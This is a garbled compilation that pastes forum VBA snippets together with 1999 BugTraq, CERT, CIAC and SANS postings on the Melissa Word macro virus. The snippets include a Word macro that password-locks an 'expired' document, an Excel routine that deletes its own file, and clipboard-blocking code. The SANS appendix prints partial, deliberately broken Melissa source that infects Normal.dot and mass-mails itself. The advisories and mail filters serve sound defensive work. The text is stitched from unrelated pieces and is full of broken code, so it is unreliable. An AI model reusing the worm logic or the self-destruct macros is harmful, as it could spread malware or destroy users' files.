Good Morning Mr. Phelps..
Good Morning Mr. Phelps..
Good Morning Mr. Phelps..
Well my answer is "yes and no" to the question, "Is the mission possible?" There is always
something that you didn't anticipate such as someone doing a screen capture or a save to
Skydrive that the Word 2011 object model fails to support... but even with those shortcomings, it
is not as far fetched as you think.
Here is free code, but if the OP is really serious, that will cost $,$$$.
Place this in a document saved as a ".docm" format. Into the "ThisDocument" class:
Option Explicit
StopCount = StopCount + 1
weThereYet = Application.Documents.Count
Option Explicit
Public Const notAllowed As String = "This is not allowed Mr. Phelps"
Public Const bigGuy As String = "The Big Guy"
Sub FileSaveAs()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSave()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub WebPagePreview()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub SendToMsgr()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub ActivateObject()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CreateAutoText()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CreateSubdocument()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FilePrint()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FilePost()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditCopy()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditCut()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub AutoText()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub CopyText()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub EditAutoText()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveAsWebPage()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveHtml()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSaveToServer()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSendMail()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Sub FileSendMailBody()
MsgBox notAllowed, vbCritical, bigGuy
End Sub
Private Sub Document_Open()
Dim oDate As Date
oDate = ActiveDocument.BuiltInDocumentProperties("Creation date")
If Now > oDate + 90 Then
MsgBox "Document has expired."
With ActiveDocument
.Password = "mydog"
.Save
.Close
End With
End If
End Sub
Option Explicit
Sub KillMe()
With ThisWorkbook
.Saved = True
.ChangeFileAccess Mode:=xlReadOnly
Kill .FullName
.Close False
End With
End Sub
I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.
There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consist of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected documents contains passwords to porn web sites.
As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.
--
Aleph One / [email protected]
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
----------------------------------------------------------------------------
Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.
http://www.root.org/
-Nate
[http://www.root.org/melissa_virus.txt]
CYA:
----------------------------------------------------------------------------
Here is my analysis of how the virus works. The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot
After sending the mail, add the registry key to disable further
infection.
4. Open the Active Document and Normal.dot and infect them with itself
5. On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters. Game's over. I'm outta here."
It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment. It
appears the virus vendors have a patch out now. To avoid infection,
disable macros when opening any Word document or just don't open the
attachment. Thanks to Josh Siegel for sending me the code.
-Nate
----------------------------------------------------------------------------
[Hide face]
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means. And that if you don't have
Outlook, breath calm. But if you do have Outlook, WATCH OUT!
And the kicker? Look at the first 50 names in your address books? How many
mailing lists are there?
This time. We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.
> After sending the mail, add the registry key to disable further
>infection.
Disables future mailings. Infections can happen again. But the email blast
will happen only the first time, unless you clean the registry. So we
recommend that you do not remove that element of the registry.
>4. Open the Active Document and Normal.dot and infect them with itself
>5. On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters. Game's over. I'm outta here."
>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment. It
>appears the virus vendors have a patch out now. To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment. Thanks to Josh Siegel for sending me the code.
Good ideas.
Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
[email protected]
----------------------------------------------------------------------------
On a lighter side...
AW
-----Original Message-----
>From: Dan Schrader [mailto:[email protected]]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; [email protected]
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)
Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents. The tool, called
HouseCall for Microsoft Exchange is available at:
http://housecall.antivirus.com/smex_housecall/
<http://housecall.antivirus.com/smex_housecall/>
This detects, but does not cure infected files. HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it. Considering this audience, I suspect you will want
to remember to set those settings back when you are done.
Virus Description:
This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ".
. . by Kwyjibo." This is how the virus determines whether it has activated
on this system.
The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.
If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to ".
. . by Kwijibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."
Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.
----------------------------------------------------------------------------
Systems Affected
Overview
Our analysis of this macro virus indicates that human action (in the
form of a user opening an infected Word document) is required for this
virus to propagate. It is possible that under some mailer
configurations, a user might automatically open an infected document
received in the form of an email attachment. This macro virus is not
known to exploit any new vulnerabilities. While the primary transport
mechanism of this virus is via email, any way of transferring files
can also propagate the virus.
Anti-virus software vendors have called this macro virus the Melissa
macro or W97M_Melissa virus.
I. Description
Where <name> is the full name of the user sending the message.
Here is that document you asked for ... don't show anyone else ;-)
Upon execution, the virus first lowers the macro security settings to
permit all macros to run when documents are opened in the future.
Therefore, the user will not be notified when the virus is executed in
the future.
"HKEY_Current_User\Software\Microsoft\Office\Melissa?"
has a value of "... by Kwyjibo". If that registry key does not exist
or does not have a value of "... by Kwyjibo", the virus proceeds to
propagate itself by sending an email message in the format described
above to the first 50 entries in every MAPI address book readable by
the user executing the macro. Keep in mind that if any of these email
addresses are mailing lists, the message will be delivered to everyone
on the mailing lists. In order to successfully propagate, the affected
machine must have Microsoft Outlook installed; however, Outlook does
not need to be the mailer used to read the message.
Next, the macro virus sets the value of the registry key to "... by
Kwyjibo". Setting this registry key causes the virus to only propagate
once per session. If the registry key does not persist through
sessions, the virus will propagate as described above once per every
session when a user opens an infected document. If the registry key
persists through sessions, the virus will no longer attempt to
propagate even if the affected user opens an infected document.
The macro then infects the Normal.dot template file. By default, all
Word documents utilize the Normal.dot template; thus, any newly
created Word document will be infected. Because unpatched versions of
Word97 may trust macros in templates the virus may execute without
warning. For more information please see:
http://www.microsoft.com/security/bulletins/ms99-002.asp
Finally, if the minute of the hour matches the day of the month at
this point, the macro inserts into the current document the message
"Twenty-two points, plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta here."
Note that if you open an infected document with macros disabled and
look at the list of macros in this document, neither Word97 nor
Word2000 list the macro. The code is actually VBA (Visual Basic for
Applications) code associated with the "document.open" method. You can
see the code by going into the Visual Basic editor.
If you receive one of these messages, keep in mind that the message
came from someone who is affected by this virus and they are not
necessarily targeting you. We encourage you to contact any users from
which you have received such a message. Also, we are interested in
understanding the scope of this activity; therefore, we would
appreciate if you would report any instance of this activity to us
according to our Incident Reporting Guidelines document available at:
http://www.cert.org/tech_tips/incident_reporting.html
II. Impact
III. Solutions
* Block messages with the signature of this virus at your mail transfer
agents.
With Sendmail
Most virus scanning tools will detect and clean macro viruses. In
order to detect and clean current viruses you must keep your
scanning tools up to date with the latest definition files.
http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
+ Symantec
http://www.symantec.com/avcenter/venc/data/mailissa.html
+ Trend Micro
http://housecall.antivirus.com/smex_housecall/technotes.html
http://www.nai.com/services/support/vr/free.asp
Acknowledgements
Additionally we would like to thank the many sites who reported this
activity.
______________________________________________________________________
Email: [email protected]
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
Using encryption
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
______________________________________________________________________
Revision History
iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
[email protected]
----------------------------------------------------------------------------
__________________________________________________________
INFORMATION BULLETIN
The W97M.Malissa Word macro virus has been seen within the DOE complex. This
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of
Microsoft Word. When an infected document is opened, the virus checks to
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar.
It then disables the following Word options:
HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?
If that string is not equal to "... by Kwyjibo" the virus sends copies of the
infected document to the first 50 people in each of your Outlook address
books and then sets the registry key so it does not do this again. It sends
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:
where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text:
Here is that document you asked for ... don't show anyone else ;-)
The virus then inserts the first 50 users from your Outlook address book,
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.
After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is
running on the Normal.dot template, it infects the active document with a
Document_Open macro that runs whenever a document is opened. After the
Normal.dot template is infected, the virus infects every document you work
on as soon as you close them. If you share these documents with anyone, you
will spread the virus.
Finally, if the minute of the hour equals the day of the month, the virus
inserts the following message at the current location in the active document.
Several antivirus vendors have a detection and cleaning capability for this
virus; however, you must go to the vendors web site to get the scanner
updates. Scanners with automatic or live update features do not yet get the
update required to find and clean this virus. While we expect the detection
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
does detect the virus, the current live update does not. We have reliable
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)
also have detection capabilities.
If you receive an e-mail with the following subject and body, DO NOT OPEN the
attachment.
Subject:
Important Message From <username>
Body:
Here is that document you asked for ... don't show anyone else ;-)
Make sure the sender is someone you know and then ask them if they really
sent you the attachment before opening it. If they did not send it, do not
open the attachment and contact your computer security manager. The most
common name for the attached file is list1.doc but that name can change.
Another option to see if a system has been infected is to use Regedit and
search for the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?
If that key exists and has the value "... by Kwyjibo" the system has been
infected at some time. Note that the infection may have been removed without
deleting the key. This key can be deleted, but does no damage if left alone.
Protecting A System
===================
To protect Word from this and other Word macro viruses, first insure that Word
has been patched with the Word 97 Template vulnerability patch
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled.
To password protect the Normal.dot file in Word 97, perform these steps:
1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice.
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.
The next time you start Word, the normal.dot template will be protected.
WARNING: If you ever have to type in the password to make changes to the
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it.
Some simple macro virus protection is built into Word 97. It does not detect
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not
necessarily a virus. However, if you are alerted to a macro attached to a
document you should be extremely wary because most people do not have macros
attached to their documents.
Prompt to save Normal template. This makes Word display a dialog box
asking you to confirm changes to the Normal.dot template. Most
macro viruses hide in Normal.dot so this lets you know that there
has been a change that you may want to prevent. Changes also occur
when you change the default font or one of the built-in styles.
To turn on macro virus protection and these other options, perform these
steps:
1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
4. Close the dialog box.
Whenever you open a document that contains macros, the macro virus protection
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open
the document without the macros, or cancel the open operation. You should
only open a document with macros enabled if you are expecting there to be
macros on that document and you know what they are supposed to do.
If a site has been infected you may need to block the virus infected mail
messages with your mail servers. The following filter was written by Scott
Hutton (Lead Security Engineer, Information Technology Security Office) of
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block
messages that do not contain the virus. Use this filter at your own
discretion.
HSubject: $>CheckSubject
SCheckSubject
RImportant Message From $+ $#error $: 553 Subject Error
R$* $@ OK
Don't forget that there are tabs before $#error and $@ OK. This will
block any message where the subject begins with "Important Message
>From ...", which may be too rash of an action at your site.
Another filter was obtained by the CERT team from Nick Christenson of
sendmail.com
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-
filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail
filter. Thanks to CERT and Nick Christenson of sendmail.com for another
sendmail filter.
_____________________________________________________________________________
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: [email protected]
If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open. According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute. This is absurdly stupid.
(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler bretheren, so to speak.)
--
Greg A. Woods
I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday. There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:
1. "Posting the source allows someone to know how to write a Macro virus"
Yes, and anyone of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source. Repeat after me:
"Word macros are INTERPRETED". All symbol information is present. No
decompilation necessary.
http://www.mit.edu:8001/people/eichin/www/virus/main.html
In short, this is the same full disclosure vs. security through obscurity
debate. Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade. Viruses tend to be
uninventive and boring. This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread. I only got
involved because I had to help fend off the nuisance Friday. I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.
-Nate
----------------------------------------------------------------------------
That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)
Per Aleph1:
The subject line is "important Message From <some user name>". The
body consist of the text "Here is that document you asked for...
don't show anyone else;-)".
:0 H
* ^Subject:.*important Message From
{
:0 B
* Here is that document you asked for
* don't show anyone else
* ^Content-.*: .*\.do[ct]
{
LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '
:0
security-quarantine
}
}
--
John Hardin KA7OHZ [email protected]
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion
the Mighty Lion
the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
52 days until Star Wars episode I
----------------------------------------------------------------------------
Aaron Wood writes (my comments are on Trend's press release forwarded by
him):
> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.
> The name of the original infected attachment was List.doc, but it
> could be any name.
Theoretically, yes. But keep in mind, that the virus sends itself by
e-mail only when it infects a clean system. What it sends, is the
document which as infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).
> If the user does not have Outlook, the virus will not work.
That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)
Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.
> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.
"File" here means "whatever is not infected - either the active document
or the normal template".
> Trend Micro has detection for this virus in its latest pattern update,
Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:
ftp://ftp.complex.is/pub/macrdef2.zip
Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
Postholf 7180, IS-127, Reykjavik, Iceland producers of F-PROT.
e-mail: [email protected], tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44 E5 F7 C3 18 EA 2B AE 4E
----------------------------------------------------------------------------
NOTE: SANS will be changing email and web servers this week. We hope
to avoid service interruptions, but some error might creep in. Problems
to <[email protected]>.
Table of Contents:
1. What Melissa teaches us
1.1 Infection Speed
1.2 Collateral Damage
1.3 Need for Defense in Depth
2. One site's experience in cleaning up after a Melissa infestation
3. Conclusion
Appendix: Melissa Source Code
You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University. This document is available
at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .
According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
>from a large number of Department of Defense and Department of Energy
sites. Many of you will probably find out today that your site has been
infected as well. This serves as a warning how fast a virus with an
unknown signature can spread. A modified, non-operative copy of the
source code is included as an appendix to this document. If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book. Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.
The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files. However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars. It also directly affects sites' ability to send and receive
email. One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong. I could feel the network going
slower and slower. As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard. The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application. The subject line read:
"Important Message From [Jane Doe]". I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc".
"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
(approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
in incident handling based on the SANS' Incident Handling Step by Step
approach.
* The person who needed to make key decisions was trained in incident
response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
the Incident Handling team by not directing what needed to be done (at
least so far)."
3. Conclusion
Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness. That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
when they call about a security threat.
NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form. We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa. Text comments have been inserted at
the "famous" locations preceded by three asterisks "***"
*** Here is the classic subject line "Important Message From" This could
change of course in future versions ***
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
"... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And
(InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
End Sub
*** The lines above are some of the most published information about
this virus. Though you can look for the virus with intrusion detection
and other string matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code could change these. ***
----------------------------------------------------------------------------
An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
>from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.
Simple Nomad //
[email protected] // ....no rest for the Wicca'd....
www.nmrc.org //
Sub Activate_timer()
' at a certain time in the future
'Application.OnTime DateSerial(2014,01,01)+TimeSerial(0,0,0), "DoSomething"
' or by specifying the time interval
Application.OnTime Now + TimeValue("01:40:00"), "DoSomething"
End Sub
Sub DoSomething()
'call the batch file
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
With Application
.CellDragAndDrop = True
.OnKey "^c"
.OnKey "^v"
.OnKey "^x"
.OnKey "+{DEL}"
.OnKey "^{INSERT}"
.CutCopyMode = False
End With
Dim Ctrl As Office.CommandBarControl
For Each Ctrl In Application.CommandBars.FindControls(ID:=19) 'copy
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=21) ' Cut
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=22) ' Paste
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=755) ' Paste Special
Ctrl.Enabled = True
Next Ctrl
End Sub
End Sub
End Sub
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
With Application
.CellDragAndDrop = True
.OnKey "^c"
.OnKey "^v"
.OnKey "^x"
.OnKey "+{DEL}"
.OnKey "^{INSERT}"
.CutCopyMode = False
End With
Dim Ctrl As Office.CommandBarControl
For Each Ctrl In Application.CommandBars.FindControls(ID:=19) ' Copy
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=21) ' Cut
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=22) ' Paste
Ctrl.Enabled = True
Next Ctrl
For Each Ctrl In Application.CommandBars.FindControls(ID:=755) ' Paste Special
Ctrl.Enabled = True
Next Ctrl
End Sub
Private Sub Workbook_Activate()
Dim oCtrl As Office.CommandBarControl
Application.CellDragAndDrop = False
End Sub